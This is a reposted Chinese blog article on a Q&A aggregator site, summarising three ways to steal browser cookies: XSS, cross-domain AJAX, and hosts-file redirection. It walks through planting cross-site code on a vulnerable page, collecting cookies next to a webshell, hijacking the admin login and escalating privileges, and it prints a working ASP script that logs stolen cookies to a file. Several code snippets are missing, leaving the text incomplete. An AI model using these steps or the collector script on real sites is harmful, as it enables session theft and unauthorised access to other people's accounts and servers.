當前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

盗COOKIE之方法总结

發布時間：2023/12/18 编程问答 25 豆豆

生活随笔收集整理的這篇文章主要介紹了盗COOKIE之方法总结小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

1.xss跨站盜cookie

2.ajax跨域盜cookie

3.hosts文件映射

對于第一種方法，首先：在有跨站漏洞的頁面貼上跨站代碼如：

//意思是接收客戶端用戶的cookie并發送到delcookie.asp這個頁面進行處理，處理的結果是通過delcookie.asp這個頁面將客戶端的cookie寫入一個叫cookie.txt的文件中，從而實現目的！

然后，在webshell與delcookie.asp同目錄之下建立一個cookie.txt文件接收cookie！

最后，通過cookie欺騙登入網站后臺！進而對網站提權，呵呵~

delcookie.asp代碼：

<html>
<title>xx</title>
<body>
<%
testfile = Server.MapPath("code.txt") //先構造一個路徑，也
就是取網站根目錄，創造一個在根目錄下的code.txt路徑，保存在
testfile中

msg = Request("msg") //獲取提交過來的msg變量，也就是
cookie值

set fs = server.CreateObject("scripting.filesystemobject")
創建一個fs對象

set thisfile = fs.OpenTextFile(testfile,8,True,0)

thisfile.WriteLine(""&msg&"")//像code.txt中寫入獲取來的
cookie

thisfile.close //關閉

set fs = nothing
%>
</body>
</html>

對于第二種方法，

利用ajax盜取cookie的難題解決：

第一個難題是ajax跨域提交數據，可以用web代理來解決，http://192.168.8.108上的a.htm代碼:

其中web.asp是一個asp代理。

這樣直接訪問http://192.168.8.108/a.htm是可以成功發送數據的。但是在跨站中，假如我們要跨192.168.8.108的站，這樣來講肯定不能讓我們放一個web.asp在上邊的，所以這種辦法不可行。

另外，其它的ie7.0下跨站想盜取cookie一般都會用到iframe標簽，在沒有研究成功ajax發送的情況下，經過搜索發現了另一種跨站的思路，不需要用iframe來跨域提交，代碼：

至于有其它更好的辦法，在IE7下能直接ajax跨域盜取cookie的歡迎討論

對于第三種方法，

采取的原理是：hosts文件的優先級比DNS服務器的優先級高！

轉載于:https://www.cnblogs.com/milantgh/p/3619405.html

以上是生活随笔為你收集整理的盗COOKIE之方法总结的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。